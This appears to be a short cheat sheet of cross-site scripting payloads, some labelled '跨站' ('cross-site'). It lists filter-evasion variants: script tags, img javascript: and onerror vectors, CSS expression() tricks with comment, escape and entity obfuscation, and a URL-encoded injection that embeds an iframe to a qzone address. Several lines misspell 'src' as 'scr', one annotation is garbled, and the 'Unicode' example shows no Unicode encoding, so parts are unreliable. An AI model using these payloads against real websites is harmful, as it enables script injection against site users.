<script>alert("跨站")</script> (most common)
<img scr=javascript:alert("跨站")></img>
<img scr="javascript: alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)" width=150></img> (whitespace produced with the Tab key)
<img scr="#" onerror=alert(/跨站/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ denotes a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
HTML entity: <div style={left:&#x0065;xpression (alert('xss'))}></div>
Unicode: <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["